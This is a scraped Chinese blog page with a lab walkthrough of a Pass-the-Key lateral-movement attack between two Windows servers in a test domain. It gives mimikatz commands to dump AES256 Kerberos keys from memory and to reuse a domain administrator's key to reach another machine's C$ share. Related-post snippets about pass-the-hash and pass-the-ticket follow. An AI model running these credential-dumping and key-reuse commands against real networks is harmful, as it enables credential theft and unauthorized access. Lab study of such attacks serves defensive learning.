Pass the key密钥传递攻击(PTK)横移

最新推荐文章于 2024-07-14 23:27:18 发布
最新推荐文章于 2024-07-14 23:27:18 发布
阅读量199 收藏
点赞数 3
文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64787896/article/details/137014799
版权

实验主机:Win2012,Win2008

1.Win2012登陆域管账号,Win2008登陆本地账号

2.Win2012域管账号远程Win2008的域账号,留下ticket

3.WIn2008开启mimikatz_x64.exe,输入sekurlsa::ekeys,查看aes256

sekurlsa::ekeys //查看aes256

(本来是有Win2012的aes256号的,Win2008由于版本原因看不到)

4.将Win2012administrator的aes256输入到mimikatz_x64.exe

sekurlsa::pth /user:administrator /domain:ctfstu.com /aes256:1282da3db4d52e0dda93af119fb933ef23fba44ed2959dc2b086825c5f68fcab

会弹出一个cmd命令框,这时可以直接输入dir \\PC2012.DAMN.com\C$查看Win2012C盘的共享文件夹

eternality269
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透(三十八)之动篇-pass the key 传递攻击(PTK)攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 710
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
内网安全:PTH PTK PTT
qq_61553520的博客
01-28 1515
​​​​​​​。
哈希传递PTH、传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1395
哈希传递PTH、传递PTT、票据传递PTK的实现和比较
PTK传递攻击
Y22Lee的博客
05-24 665
PTK(Pass The key),中文叫传递攻击,PTH传递中,使用的是NTLM-HASH值,PTK使用AES256或者AES128的方式进行传递,PTK 攻击只能用于kerberos认证中,NTLM认证中没有!Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。
内网动—PTH哈希&PTT票据&PTK匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1425
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入码之后,码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文码!
[内网] 向渗透的几种方式
weixin_43586169的博客
07-28 4757
详细介绍了,向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
第68天:内网安全-域向PTH&PTK&PTT哈希票据传递1
08-03
PTKPass the Key)则依赖于AES256,特别是在KB2871997补丁已安装的情况下。它允许攻击者使用AES256代替NTLM哈希进行连接,这在某些情况下使得攻击更为隐蔽和有效。 PTT(Pass the Ticket)涉及的是...
PythonToolkit (PTK)-开源
05-13
Python Toolkit(PTK)是一个强大的开源工具,专为Python编程语言设计,致力于为科学家、工程师以及广大编程爱好者提供一个高效且功能丰富的交互式环境。它的诞生是为了满足对类似Matlab的工作环境的需求,但同时...
PTK9.py
05-11
PTK9.py
校园网模拟PTK设计
12-18
使用思科的PTK软件模拟的一个校园网网络,需要Cisco Packet Tracer软件
ptk888
02-12
关于Laravel Laravel是一个具有表达力,优雅语法的Web应用程序框架。 我们认为,发展必须是一种令人愉悦的创造力,才能真正实现。 Laravel通过减轻许多Web项目中使用的常见任务来减轻开发工作的痛苦,例如: ...
windows内网渗透PTH/PTK攻击
ATpiu的博客
07-18 6170
前言 windows内网渗透中,有三种最常用的pass系列攻击pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass the key传递攻击,简称ptk) 1.1 pass the hash攻击 1.1.1 NTLM HASH windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高: 用户名称:RID:LM-HASH值:NTLM-HASH值 自Windows Vista和Wi
内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK传递
战神/calmness的博客
10-01 857
目录 PTH(pass-the-hash) Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) ms14-068 Golden ticket (黄金票据) silver ticket (白银票据) PTK (pass the key) ​​​​​​​ PTH(pass-the-hash) 描述 pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java 中钻石操作符 <> 的使用场景
qq_27390023的博客
07-10 419
钻石操作符在 Java 中的主要作用是简化泛型类型的实例化,减少代码冗余,使代码更加简洁和可读。它通过类型推断机制,让编译器自动推断出类型参数,而不需要程序员显式地重复类型参数。这样不仅减少了代码量,还减少了出错的可能性。
Android RecyclerView
学无止境,止于至善
07-14 205
需要注意的是RecyclerView没有提供setOnItemClickListener()方法,RecyclerView的item单击事件往往在Adapter中实现,在Adapter中可以对整个item或者item的各个控件实现单击事件。RecyclerView不仅可以实现和ListView同样的效果,还优化了ListView中的各种不足。是一种新型的列表控件,它的目标是为任何基于适配器的视图提供相似的渲染方式。5)设计RecyclerView中的方法。表1 RecyclerView的常用方法。
C++中链表的底层迭代器实现
最新发布
2302_80214413的博客
07-14 242
这次详细的向大家讲述了C++中链表的底层迭代器的实现,还有链表底层迭代器和顺序表的不同之处,供大家参考!!!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值